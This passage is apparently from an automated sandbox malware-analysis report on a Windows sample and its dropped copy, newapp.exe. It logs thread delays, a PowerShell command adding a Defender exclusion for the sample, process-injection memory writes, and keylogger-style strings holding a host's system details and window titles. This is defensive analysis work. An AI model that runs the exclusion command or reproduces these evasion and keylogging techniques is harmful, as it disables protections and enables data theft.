                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599753Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599625Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599516Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599391Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599280Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599168Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599062Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598951Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598842Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598703Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598487Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598349Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598219Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597891Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597563Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597094Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596969Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596750Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596640Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595968Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595842Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595732Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595625Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595516Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595406Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595285Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595156Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595047Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594938Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594813Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594700Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594593Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594484Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594375Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594251Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594016Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 593906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599538Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599434Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599325Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599214Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598884Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598764Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598655Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596162Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599891
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599672
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599563
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599438
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599313
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599188
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599078
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598969
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598844
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598735
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598610
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598485
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598360
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598235
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598110
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597985
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597860
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597735
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597610
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597485
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597360
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597235
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597110
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596985
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596860
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596735
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596610
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596485
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596360
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596235
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596110
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595985
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595860
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595735
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595610
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595485
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595360
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595235
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595110
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594985
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594860
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594735
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594437
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594327
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594208
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594094
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 593985
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 593860
                    Source: dhPWt112uC.exe, 00000004.00000002.4164255041.0000000001592000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr{/
                    Source: newapp.exe, 0000000A.00000002.2000796794.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4164521969.00000000011C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory written: C:\Users\user\Desktop\dhPWt112uC.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory written: C:\Users\user\AppData\Roaming\newapp\newapp.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess created: C:\Users\user\Desktop\dhPWt112uC.exe "C:\Users\user\Desktop\dhPWt112uC.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q8<b>[ Program Manager]</b> (11/01/2025 14:38:48)<br>{Win}THcqL$P
                    Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q9<b>[ Program Manager]</b> (11/01/2025 14:38:48)<br>{Win}rTHcqL$P
                    Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3<b>[ Program Manager]</b> (11/01/2025 14:38:48)<br>
                    Source: dhPWt112uC.exe, 00000004.00000002.4168329440.0000000003508000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <html>Time: 01/26/2025 20:34:39<br>User Name: user<br>Computer Name: 910646<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.189<br><hr><b>[ Program Manager]</b> (11/01/2025 14:38:48)<br>{Win}r</html>
                    Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt/P
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Users\user\Desktop\dhPWt112uC.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
